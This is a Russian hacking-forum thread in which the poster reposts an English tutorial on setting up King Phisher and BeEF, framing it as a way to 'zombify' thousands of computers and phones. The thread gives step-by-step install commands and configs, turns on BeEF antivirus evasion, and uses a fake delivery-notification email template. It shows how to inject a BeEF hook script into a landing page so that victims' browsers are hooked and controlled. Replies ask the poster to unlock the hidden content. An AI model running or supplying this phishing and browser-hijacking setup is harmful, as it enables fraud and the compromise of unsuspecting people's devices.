Создаем супер мега крутую машину для зомбирования компьютеров, телефонов (Часть 1)

I

ins1der

Original poster
Если вникните то вы поймете что это просто гениально!
Инструкция на англ, лично я почти не знаю англ. но все понял прекрастно
Здесь написано как сделать подобие ботнета который сам себя спаммит используя:
KingPhisher + BeEF
Хайд буду открывать, но не всем.
Информация предоставленна в целях ознакомления!
Автор темы и администрация hhide.su не несет ответственности за нанесенный вами ущерб
Используя данный метод можно заразить тысячи устройств за пару дней
Будьте осторожнее с этим, отдел К не спит)


Running a phishing campaign against your organisation is a good way to educate users against the perils of the inbox. Some of the common problems with education-based phishing runs of any reasonable size include:
  • The pain of spinning up infrastructure for the campaign
  • Tracking user participation and response
  • The reconfiguration efforts required each time a new set of individuals is targeted


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

takes care of a lot of those problems. Here’s my quick and dirty setup that utilises a $10-per-month VPS service to run the campaign.

Scenario
As mentioned earlier, I’ll be deploying this to a $10/month cloud server on

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

as a 24/7 service is needed for a proper phishing campaign, and Digital Ocean offers a solid product at the right price. Not necessary, you can host it yourself of course.

To increase the chances of a successful campaign, we’ll be running the king-phisher web server on TCP port 80, and BeEF on TCP port 443 as both HTTP and HTTPS are pretty much guaranteed to be permitted on the outbound route of a normal business network.

Prerequisites

  • A box running Ubuntu 14.10 x64 (this probably works on Debian and a range of other distros, but no guarantees)
  • A standard user configured (via adduser)
  • Remotely accessible SSH server running
Configuring the king-phisher server
So I’ve got my cloud Ubuntu 14.10 x64 virtual machine ready to go, freshly updated/upgraded using the apt package manager. Next step is to install postgresql (we won’t be using sqlite as support is being wound back for king-phisher) along with some other dependencies, and then run the automated installer script. Use sudo or the root account as you see fit:
Код:
    root@deceptor:~# apt-get install postgresql  python-mpltoolkits.basemap python-mpltoolkits.basemap-data
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    The following extra packages will be installed:
    postgresql-9.4 postgresql-client-9.4 postgresql-client-common postgresql-common ssl-cert
    …
    * Starting PostgreSQL 9.4 database server                                                                                     [OK ]
    Setting up postgresql (9.4+162) …
    root@deceptor:~#
    root@deceptor:~# cd /opt && wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
    Linux version detected as Ubuntu
    Downloading and installing the King Phisher server to /opt/king-phisher
    Successfully cloned the git repo
    Installing Ubuntu dependencies
    …
    root@deceptor:/opt#
This will pull the latest version of king-phisher from SecureState’s GitHub repository, download all the dependencies and install king-phisher in the /opt directory. Go grab some coffee, as there are a number of packages for the installer to pull and configure. It took around 10 minutes.

If you happen to get any pip errors (particularly ImportError: cannot import name IncompleteRead), then you may need to re-install pip via easy_install:
Код:
    root@deceptor:~# apt-get remove python-pip
    …
    …
    root@deceptor:~# easy_install pip
    Searching for pip
    Reading https://pypi.python.org/simple/pip/
    …
    …
    Finished processing dependencies for pip
    root@deceptor:~#
…then rerun setup.sh to finish installing the server.

Once it’s complete, you’ll need to configure Postgresql to support your king-phisher instance. Use your favourite editor to add the following line to /etc/postgresql/9.4/main/pg_hba.conf:
Код:
    host    “king_phisher”  “king_phisher”  127.0.0.1/32            md5
..then configure the Postgresql user account for king_phisher:
Код:
    root@deceptor:~# su postgres
    postgres@deceptor:~# createuser king_phisher -P
    Enter password for new role: :<yourpassword>
    Enter it again: :<yourpassword>
    postgres@deceptor:~#  createdb –owner=king_phisher king_phisher
    postgres@deceptor:~# exit
    root@deceptor:~#
If during the creation you are asked any questions about the role of the king_phisher user, just answer “n” to all of them. Once this is done, you’ll need to update the king-phisher server configuration to use your newly-created Postgresql database by editing /opt/king-phisher/server_config.yml. Comment out the following line:
Код:
database: sqlite:////var/king-phisher/king-phisher.db
..then add the following:
Код:
    database: postgresql://king_phisher:<yourpassword>@localhost/king_phisher
Make sure your indenting is accurate, then restart the Postgresql server. Test to make sure KingPhisherServer starts correctly:
Код:
oot@deceptor:~# /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml
INFO     listening on 0.0.0.0:80
INFO     0.0.0.0:80 – basic authentication has been enabled
INFO     0.0.0.0:80 – serving files has been enabled
INFO     initializing database connection with driver postgresql
INFO     the job manager has been started
WARNING  the specified geoip database does not exist, downloading a new copy
INFO     Starting new HTTP connection (1): geolite.maxmind.com
INFO     server running in process: 22826 main tid: 0x7ffbb4525740
INFO     dropped privileges to the nobody account
Ok, the king-phisher server is now sorted. Ctrl+C to kill it for now, as it’s time to install BeEF into the /opt directory and configure its dependencies:
Код:
    root@deceptor:/opt# git clone https://github.com/beefproject/beef.git
    Cloning into ‘beef’…
    remote: Counting objects: 24769, done.
    remote: Total 24769 (delta 0), reused 0 (delta 0), pack-reused 24769
    Receiving objects: 100% (24769/24769), 9.69 MiB | 3.73 MiB/s, done.
    Resolving deltas: 100% (12811/12811), done.
    Checking connectivity… done.
    root@deceptor:/opt/beef# apt-get install ruby-all-dev libsqlite3-dev sqlite3
    …
    root@deceptor:/opt# gem install rvm
    …
    root@deceptor:/opt# gem install bundler
    …
    root@deceptor:/opt# cd beef
    …
    root@deceptor:/opt/beef# ./beef
    Could not find gem ‘eventmachine (>= 0) ruby’ in any of the gem sources listed in your Gemfile or available on this machine.
    Run `bundle install` to install missing gems.
    root@deceptor:/opt/beef# bundle install
    …
    root@deceptor:/opt/beef#
Edit /opt/beef/config.yaml and change the server port to 443:
Код:
    # HTTP server
        http:
            debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
            host: “0.0.0.0”
            port: “443”
…then enable antivirus evasion:
Код:
     evasion:
                enable: true
You should also DEFINITELY change the admin password for BeEF – this is also configurable in /opt/beef/config.yaml. You should now be able to run BeEF:
Код:
    root@deceptor:/opt/beef# ./beef
    [ 6:45:33][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
    [ 6:45:34][*] Browser Exploitation Framework (BeEF) 0.4.6.0-alpha
    [ 6:45:34]    |   Twit: @beefproject
    [ 6:45:34]    |   Site: http://beefproject.com
    [ 6:45:34]    |   Blog: http://blog.beefproject.com
    [ 6:45:34]    |_  Wiki: https://github.com/beefproject/beef/wiki
    [ 6:45:34][*] Project Creator: Wade Alcorn (@WadeAlcorn)
    [ 6:45:34][*] BeEF is loading. Wait a few seconds…
    [ 6:45:39][*] 13 extensions enabled.
    [ 6:45:39][*] 240 modules enabled.
    [ 6:45:39][*] 3 network interfaces were detected.
    [ 6:45:39][+] running on network interface: 127.0.0.1
    [ 6:45:39]    |   Hook URL: http://127.0.0.1:443/hook.js
    [ 6:45:39]    |_  UI URL:   http://127.0.0.1:443/ui/panel
    [ 6:45:39][+] running on network interface: 1.2.3.4
    [ 6:45:39]    |   Hook URL: http://1.2.3.4:443/hook.js
    [ 6:45:39]    |_  UI URL:   http://1.2.3.4:443/ui/panel
    [ 6:45:39][+] running on network interface: 2.3.4.5
    [ 6:45:39]    |   Hook URL: http://12.3.4.5:443/hook.js
    [ 6:45:39]    |_  UI URL:   http://2.3.4.5:443/ui/panel
    [ 6:45:39][*] RESTful API key: 3cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx8e
    [ 6:45:39][*] DNS Server: 127.0.0.1:5300 (udp)
    [ 6:45:39]    |   Upstream Server: 8.8.8.8:53 (udp)
    [ 6:45:39]    |_  Upstream Server: 8.8.8.8:53 (tcp)
    [ 6:45:39][*] HTTP Proxy: http://127.0.0.1:6789
    [ 6:45:39][*] BeEF server started (press control+c to stop)
Righto, now we need to configure our mail transport agent. I won’t be using the king-phisher version, not because it’s not great, but just because so I’ll configure postfix instead. Swap out myname@mydomain for an appropriate value:
Код:
    root@deceptor:/opt/beef# apt-get install mailutils postfix
    …
Select Internet Site and pick an appropriate FQDN value. THe sort out the rest of the config:
Код:
    root@deceptor:/opt/beef# echo “root [email protected]” > /etc/postfix/generic
    root@deceptor:/opt/beef# postmap /etc/postfix/generic
Add an entry to smtp_generic maps and change the inet_interfaces value to 127.0.0.1 in /etc/postfix/main/cf:
Код:
    inet_interfaces = 127.0.0.1
    smtp_generic_maps = hash:/etc/postfix/generic
Restart postfix. Done.
Configuring the KingPhisher client
Configuring the client is pretty straight forward – see the

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

for a list of known supported platforms/OS. I’ll be using Kali 1.0.8 to run the client.Easiest way to get the client is to carbon copy what we did for the server, and install the extra packages that allow us to use the mapping functionality:
Код:
    root@kali:~# apt-get install libgeos++-dev libgeos-3.3.3 libgeos-dev python-mpltoolkits.basemap python-mpltoolkits.basemap-data
    Reading package lists… Done
    Building dependency tree 
    Reading state information… Done
    …
    …
    root@kali:~#
    root@kali:~# wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && sudo bash ./install.sh
    Linux version detected as Kali
    Downloading and installing the King Phisher server to /opt/king-phisher
    …
    …
    Start the King Phisher server with the following command:
    sudo /opt/king-phisher/KingPhisherServer -L INFO -f /opt/king-phisher/server_config.yml
    root@kali:~#
Now you should be able to run the gui client by navigating to /opt/king-phisher and running ./KingPhisher:
bb01.jpg

Back on your Digital Ocean box, start both the KingPhisher server and BeEF server, then fill in the connection details on your client and click Connect. Create a new campaign by giving it a name and click Select. You’ll now need to start filling in the fields for your campaign. Make sure you fill in all the fields – particularly the source email values. The campaign won’t run without them.

Let’s use the “fake delivery notification” template by setting the Message HTML file to
/opt/king-phisher/data/client/king_phisher/email_templates/purchases.html. This will utilise the fake delivery notification email template which will be sent to our victims.

The document root for KingPhisher’s webserver is specified in the last line /opt/king-phisher/server_config.yaml – the default location is /var/www so we’ll put all our web content there. For this campaign, let’s just symlink the web content for the education package provided by SecureState. Jump back onto your Digital Ocean box and run the following:

Код:
    root@deceptor:~# ln -s /opt/king-phisher/data/server/king_phisher/education/* /var/www

We will also use one of the SecureState email templates in the next step. Back on your Kali box (or whatever system you’re using to run the KingPhisher client) create a CSV file containing one firstname,lastname,emailaddress per line for each target in VIM/Nano/YourFavourite editor.

Now we should have everything we need to run the campaign:

bb02.jpg

The following fields are the most critical:

Web Server Url: This will be the address of your Digital Ocean box, mapped through to /var/www (I’ve obviously added a DNS record for mine here).
Source Email: The fake originating email address.
Message HTML File: Template for the campaign, located on your local system.
Target CSV File: The file containing your targets.

In the Edit tab, you can see how each element is pulled from the KingPhisher configuration and your template file to populate each mail. Once you’re happy with everything, click the Preview tab to see what your phishing email will look like.

SMTP Configuration settings
We need to tell the client how to talk to our postfix mail server. In the client, select Edit>Preferences and click the SMTP Server tab. Ensure the following are set:

– SMTP Server is set to localhost:25
– Tunnel Over SSH is on
– SSH Server Name is your Digital Ocean IP address
– SSH Username is your standard username on your Digital Ocean box

Click Apply when finished. It can take a little while for the GUI to become responsive again, so be patient.

Integrating BeEF hooks
Before we send this one off, we should configure the Beef hook to give us more exploitation options. Once again, under Edit>Preferences of the client you’ll find the BeEF Settings section under the Server tab. Take a look at your running version of BeEF on your Digital Ocean box (or the BeEF config itself) to find the hook URL and include that (something like

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

) Remember – if you’ve followed this tutorial step by step, the hook should be running on TCP port 443.

You’ll need to make sure your victim(s) run the BeEF hook when they hit the landing page. Edit/var/www/index.html and add the following after the <head> tag:
Код:
<script src=”/kp.js” ></script>
Great, now they will be BeEF-hooked when they visit.

Initiate the campaign
Right, you should now be ready to go! In the Configuration tab, click Verify URL to make sure your KingPhisher server is running and that the landing page for your victims is active and reachable. Go to the Send tab and click Start to kick off your campaign. You’ll be asked to authenticate your client to your Digital Ocean box once more, the off go your nasty emails! Now you can sit back and watch the magic via the View Campaign tab or play with your victims via BeEF’s control panel.

I won’t walk you through campaign management and all the cool features that KingPhisher has, including global mapping, activity tracking, etc, suffice to say that it’s a great platform to run your campaigns from and is very easy to use once you’re set up.

Next time
I’ll follow up this post shortly to cover off some more functionality that you will find useful for your phishing campaigns, including:

– Enabling SSL/TLS
– Capturing credentials
 
Последнее редактирование модератором:
  • Like
Реакции: mrx123 и Guffii1
L

Likantrop

Original poster
слушай а может хайд снизеш?
 
I

ivanushla1

Original poster
Мда, раз это так гениально и не все поймут, то может хайд снизишь?
 
M

Mqtreek

Original poster
да хайд большой , думаю когда нибудь ещё снизишь
 
W

wazls

Original poster
Личный нельзя? А то как раз появилось время почитать
 
P

PanchManch

Original poster
Мне вот тоже интересно, но лучше хайд не снижайте=)))
 
I

illusion_Life

Original poster
>Хайд буду открывать, но не всем.
Откроешь?
 
L

Likantrop

Original poster
выделиш личный или я не царских кровей?
 
G

Goldimor

Original poster
Плaти - и всеровно хaйды...
 
G

Guffii1

Original poster
В репу плюсанул тема норм))
 
Название темы
Автор Заголовок Раздел Ответы Дата
Support81 Важно!!! Создаем свой VPN с защищенным от блокировок протоколом AmneziaWG, или WireGuard на максималках Анонимность и приватность 3
Q Интересно Создаем Telegram-бота по продаже виртуальных номеров. Обучения, схемы, мануалы 0
Denik Создаем клон сайта Полезные статьи 4
L Создаем рекламный вирус и зарабатываем Полезные статьи 4
E Интересно Создаем хороший словарь для BruteForce Бруты/Парсеры/Чекеры 6
S Опасные изображения. Создаем вредоносный код в картинке Вирусология 6
1 Создаем трояна для Андроид Spam/DDOS/Malware 2
P Pass the Hash через Open XML. Создаем документ с сюрпризом для перехвата хеша NTLMv2-SSP и брутим пароль Полезные статьи 0
S Создаем паспорт и снилс сами Полезные статьи 0
АнАлЬнАя ЧуПаКаБрА Создаем безопасную переписку на телефоне Анонимность и приватность 6
Admin DeadCrush.Создаем ботнет из сайтов. Уязвимости и взлом 1
Admin DrDos. Создаем ботнет никого не взломав Полезные статьи 0
C Создаем игру Need for Speed на Unity Другие ЯП 0
Z Создаем ссылку на запрос токена СИ/Фишинг/Мошенничество 13
C Создаем Open VPN Server.Анонимно арендуем VPS/ Анонимность и приватность 9
M Создаем с нуля сканы документов профессионального уровня Полезные статьи 0
Admin Создаем MiTM ловушку, Banana Pi R1 (BPI-R1) Уязвимости и взлом 1
T Генератор баз (делаем супер приват базы). Софт для работы с текстом/Другой софт 2
K Закрыто Пробив/восстановление/детализация Мтс/билайн/мега/теле2/йота Корзина 5
S ак мега,вк микс,гагрузка 2018,может кому и надо,2 гига Раздача email 2
P мега с чекера Раздача (аккаунтов/ключей) 0
N Токен RKT8 мега абуз Способы заработка 0
I Делаем из старенького ноутбука мега скоростной взломщик паролей Полезные статьи 36

Название темы